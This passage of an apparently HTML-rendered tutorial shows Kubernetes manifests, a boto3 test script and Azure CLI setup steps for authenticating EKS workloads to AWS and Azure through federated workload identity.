  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
  &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;eks.amazonaws.com/role-arn&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;arn:aws:iam::YOUR_AWS_ACCOUNT_ID:role/eks-cross-cloud-role&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;eks-aws-test&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;eks-cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;restartPolicy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Never&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-test&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;python:3.11-slim&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;sh&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;-c&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
        &lt;span class="s"&gt;pip install --no-cache-dir boto3 &amp;amp;&amp;amp; \&lt;/span&gt;
        &lt;span class="s"&gt;python /app/test_aws_from_eks.py&lt;/span&gt;
    &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AWS_REGION&lt;/span&gt;
        &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;us-east-1&lt;/span&gt;
    &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
        &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/app&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
      &lt;span class="na"&gt;configMap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-test-code&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ConfigMap&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-test-code&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;test_aws_from_eks.py&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;# Code will be provided below&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Test Code (Python):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# test_aws_from_eks.py
&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_aws_access&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Test AWS S3 access using IRSA&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# SDK automatically uses IRSA credentials
&lt;/span&gt;        &lt;span class="n"&gt;s3_client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s3&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# List buckets to verify access
&lt;/span&gt;        &lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;s3_client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;list_buckets&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;AWS Authentication successful!&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Found &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Buckets&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; S3 buckets:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;bucket&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Buckets&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;][:&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;  - &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;bucket&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Name&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Get caller identity
&lt;/span&gt;        &lt;span class="n"&gt;sts_client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;sts&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;identity&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sts_client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get_caller_identity&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;Authenticated as: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;identity&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Arn&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;
    &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="nb"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;AWS Authentication failed: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;test_aws_access&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Success Logs&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you see logs like below for the pods &lt;code&gt;kubectl logs -f -n default eks-aws-test&lt;/code&gt;, it means the EKS to AWS Authentication worked.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;AWS Authentication successful!
Found &amp;lt;number of buckets&amp;gt; S3 buckets:
  - bucket-1
  - bucket-2
  - ...

Authenticated as: arn:aws:sts::YOUR_AWS_ACCOUNT_ID:assumed-role/eks-cross-cloud-role/botocore-session-&amp;lt;some random number&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  1.2 Authenticating to Azure from EKS
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Cross-Cloud Authentication Flow:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgeusm2iei2jdv37im84r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgeusm2iei2jdv37im84r.png" alt="eks to azure" width="800" height="495"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; We use &lt;code&gt;api://AzureADTokenExchange&lt;/code&gt; as audience to reuse the projected token across Azure and AWS. In production dedicated to Azure only, this is the standard audience for Azure Workload Identity.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Setup Steps:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Make sure you have done  `az login` and set the subscription you want to work in before proceeding with next steps&lt;/span&gt;

&lt;span class="c"&gt;# 1. Get EKS OIDC issuer URL&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;aws eks describe-cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; my-eks-cluster &lt;span class="nt"&gt;--region&lt;/span&gt; us-east-1 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"cluster.identity.oidc.issuer"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--output&lt;/span&gt; text&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# 2. Create Azure AD application&lt;/span&gt;
az ad app create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--display-name&lt;/span&gt; eks-to-azure-app

&lt;span class="nv"&gt;APP_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az ad app list &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--display-name&lt;/span&gt; eks-to-azure-app &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"[0].appId"&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# 3. Create service principal&lt;/span&gt;
az ad sp create &lt;span class="nt"&gt;--id&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt;

&lt;span class="nv"&gt;OBJECT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az ad sp show &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--id&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="nb"&gt;id&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# 4. Create federated credential&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; federated-credential.json &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt;
{
  "name": "eks-federated-identity",
  "issuer": "&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;",
  "subject": "system:serviceaccount:default:eks-cross-cloud-sa",
  "audiences": [
    "api://AzureADTokenExchange"
  ]
}
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;az ad app federated-credential create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--id&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--parameters&lt;/span&gt; federated-credential.json

&lt;span class="c"&gt;# 5. Assign Azure role (using resource-specific scope for security)&lt;/span&gt;
&lt;span class="nv"&gt;SUBSCRIPTION_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az account show &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="nb"&gt;id&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# First create the storage account, then get its resource ID&lt;/span&gt;
az group create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; eks-cross-cloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt; eastus &lt;span class="nt"&gt;--subscription&lt;/span&gt; &lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt;

az storage account create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; ekscrosscloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; eks-cross-cloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt; eastus &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--sku&lt;/span&gt; Standard_LRS &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--kind&lt;/span&gt; StorageV2 &lt;span class="nt"&gt;--subscription&lt;/span&gt; &lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt;

&lt;span class="c"&gt;# Get storage account resource ID for proper scoping&lt;/span&gt;
&lt;span class="nv"&gt;STORAGE_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az storage account show &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; ekscrosscloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; eks-cross-cloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="nb"&gt;id&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--output&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

az role assignment create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--assignee&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt; &lt;span class="s2"&gt;"Storage Blob Data Reader"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--scope&lt;/span&gt; &lt;span class="nv"&gt;$STORAGE_ID&lt;/span&gt;

&lt;span class="c"&gt;# 6. Create test container&lt;/span&gt;
az storage container create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; test-container &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--account-name&lt;/span&gt; ekscrosscloud &lt;span class="nt"&gt;--subscription&lt;/span&gt; &lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--auth-mode&lt;/span&gt; login

&lt;span class="c"&gt;# find the tenant ID, you will need for yaml manifests below&lt;/span&gt;
&lt;span class="nv"&gt;TENANT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az account show &lt;span class="nt"&gt;--query&lt;/span&gt; tenantId &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Kubernetes Manifest:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Submit the manifest below to validate the Scenario 1.2, if authentication is working you will see success logs as shown below -&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# scenario1-2-eks-to-azure.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;eks-azure-test&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="c1"&gt;# eks-cross-cloud-sa SA is created in Scenario 1.1 above&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;eks-cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-test&lt;/span&gt;
      &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;python:3.11-slim&lt;/span&gt;
      &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;sh&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;-c&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;pip install --no-cache-dir azure-identity azure-storage-blob &amp;amp;&amp;amp; \&lt;/span&gt;
          &lt;span class="s"&gt;python /app/test_azure_from_eks.py&lt;/span&gt;
      &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AZURE_CLIENT_ID&lt;/span&gt;
          &lt;span class="c1"&gt;# replace YOUR_APP_ID with actual value for the app you created above&lt;/span&gt;
          &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;YOUR_APP_ID"&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AZURE_TENANT_ID&lt;/span&gt;
          &lt;span class="c1"&gt;# replace YOUR_TENANT_ID with actual value, you can find using `az account show --query tenantId --output tsv`&lt;/span&gt;
          &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;YOUR_TENANT_ID"&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AZURE_FEDERATED_TOKEN_FILE&lt;/span&gt;
          &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/azure/tokens/azure-identity-token&lt;/span&gt;
      &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
          &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/app&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-token&lt;/span&gt;
          &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/azure/tokens&lt;/span&gt;
          &lt;span class="na"&gt;readOnly&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
      &lt;span class="na"&gt;configMap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-test-code&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-token&lt;/span&gt;
      &lt;span class="na"&gt;projected&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;sources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
